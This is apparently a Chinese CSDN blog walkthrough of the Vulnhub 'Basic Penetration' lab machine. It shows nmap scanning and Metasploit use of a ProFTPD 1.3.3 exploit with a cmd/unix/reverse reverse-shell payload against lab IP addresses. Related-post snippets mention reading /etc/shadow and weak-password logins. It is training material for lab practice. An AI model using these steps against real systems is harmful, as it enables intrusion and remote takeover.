Basic penetration靶机

于 2024-08-04 22:40:03 发布
阅读量129 收藏
点赞数
文章标签: tcp/ip 网络协议 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74232792/article/details/140913517
版权

扫描IP

端口扫描

nmap -p- -A 192.168.111.139

getshell

根据服务版本搜索相关漏洞,在kali输入 msfconsole命令,进入到该框架内

先看看可以利用的脚本,输入 search proftpd 1.3.3(为什么是proftpd 1.3.3,因为之前探测到是这个版本)

search proftpd 1.3.3

由上图,我们进入利用的脚本,选择用序号2的那一个:use 2;

提权

查看要设置的参数(show options)

set payload  cmd/unix/reverse
set rhosts 192.168.111.139      #靶机ip
set lhost 192.168.111.147       #kali的ip
run

优化命令执行终端,执行下面命令进入python交互式(注意要下载python环境才能运行)

.南捱
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Hacking Basic Security Penetration Testing and How to Hack mobi
09-24
Hacking Basic Security Penetration Testing and How to Hack 英文mobi 本资源转载自网络,如有侵权,请联系上传者或csdn删除 本资源转载自网络,如有侵权,请联系上传者或csdn删除
Hacking Basic Security Penetration Testing and How to Hack 无水印pdf
09-24
Hacking Basic Security Penetration Testing and How to Hack 英文无水印pdf pdf所有页面使用FoxitReader和PDF-XChangeViewer测试都可以打开 本资源转载自网络,如有侵权,请联系上传者或csdn删除 本资源转载...
【vulnhub】Basic Penetration靶机
wbplife的博客
08-04 198
因为我们知道管理员账户与密码,所以利用msf的模块来getshell,启动msf,成功 getshell。在文件/etc/shadow里面进行查看密码,发现marlinspike用户的密码,进行解密。网址后面拼接目录扫到的/secret,发现是 wordpress 搭建的。访问 /wp-admin 页面,是一个登录页面。进行sudo提权尝试,发现需要输入密码,不能用。尝试弱口令,admin:admin 成功登录。发现/etc/shadow文件是可读的。端口扫描,开启了22,80,21端口。
Basic-penetration靶机
zdd1453691081的博客
08-04 34
(1)ip扫描
Basic-penetration靶机渗透测试
最新发布
weixin_58786230的博客
08-04 104
【代码】Basic-penetration靶机渗透测试。
Vulnhub靶机basic_pentesting_1
qq_48904485的博客
02-29 427
运行环境:Virtualbox攻击机:kali(10.0.2.4)靶机basic_pentesting_1(10.0.2.6)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/basic-pentesting-1,216/
basic_pentesting_1靶机的信息收集技术和漏洞扫描技术学习运用
zyzy0512的博客
07-01 1033
打开kali输入ifconfig回车,如图1.1所示。
vulnhub/Basic Penetration
qq_45230030的博客
04-29 168
日常打靶其中也附有相应的WP,也是有很多种方法,怎么方便怎么来吧。下载完靶机,更改网络为NAT模式,与攻击机设置为同一网卡模式。攻击机(kali)IP:192.168.59.143。
Vulnhub靶机 Basic penetration(渗透测试详解)
2301_78721909的博客
08-03 44
使用searchsploit工具搜索该版本的历史漏洞,发现存在命令执行漏洞。根据nmap的扫描结果发现ftp的版本为。2、对靶机IP进行主机发现和端口扫描。发现开放了21、22、80端口。成功获取root权限。
漏洞复现 -- Basic penetration
2301_80854251的博客
06-28 190
漏洞复现 -- Basic penetration
[Vulnhub] basic_pentesting 2
weixin_63231007的博客
07-12 690
目录信息搜集 S2-052漏洞利用 Hydra爆破jan密码(1) vim读取密码 (2) ssh公钥私钥获取身份登录凭据下载链接:Basic Pentesting: 2 ~ VulnHubnmap -sP 192.168.236.0/24 扫描一下靶机ipnetdiscover -i eth0 -r 192.168.1.0/24靶机ip : 192.168.236.138nmap -A 192.168.236.138 扫描一下靶机的具体信息。 收集靶场环境的服务和端口信息我们可以看见139和4...
Hacking Basic Security, Penetration Testing and How to Hack 无水印pdf
09-24
Hacking Basic Security, Penetration Testing and How to Hack 英文无水印pdf pdf所有页面使用FoxitReader和PDF-XChangeViewer测试都可以打开 本资源转载自网络,如有侵权,请联系上传者或csdn删除 本资源...
Penetration Testing
04-30
Penetration testing A Hands-On Introduction to Hacking
Penetration Testing Bootcamp
07-01
Penetration Testing Bootcamp English | 2017 | ISBN-10: 1787288749 | 258 pages | PDF + EPUB + MOBI(conv) | 4.16 Mb Key Features Get practical demonstrations with in-depth explanations of complex ...
c++网络编程实战——开发基于协议的文件传输模块(一)如何实现一个简单的tcp长连接
qq_73924465的博客
08-03 524
我们知道tcp在建立连接的时候会通过三次握手与四次挥手来建立tcp连接,而服务端与客户端之间的工作流程一般是这样的:它的工作流程如下:1.客户端向服务端发送连接请求2.服务端接收客户端连接请求3.二者之间相互发送报文实现数据的传输4.断开连接这种一完成数据交换就断开连接的通讯方式我们称为tcp的短连接。那么现在问题来了:客户端与服务端连接是需要时间的,同时是否可以立即连接上是不确定的(如果现在服务端可连接的客户端已达到上限),如果我们希望让客户端与服务端始终保持连接状态,应该怎么办呢?
【计算机网络】三次握手、四次挥手
m0_64280569的博客
07-23 1336
问:三次握手 四次挥手TCP 连接过程是 3 次握手,终止过程是 4 次挥手。
计算机网络-http协议和https的加密原理
weixin_48344647的博客
08-03 914
详细讲解了http协议和https的加密原理
WebSocket 协议介绍
dashalen的博客
08-04 570
参考链接/*| 魔数 2byte | 协议版本号 1byte | 序列化算法 1byte | 报文类型 1byte || 状态 1byte | 保留字段 4byte | 数据长度 4byte || 数据内容 (长度不定) | 校验字段 2byte |*/待补充。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值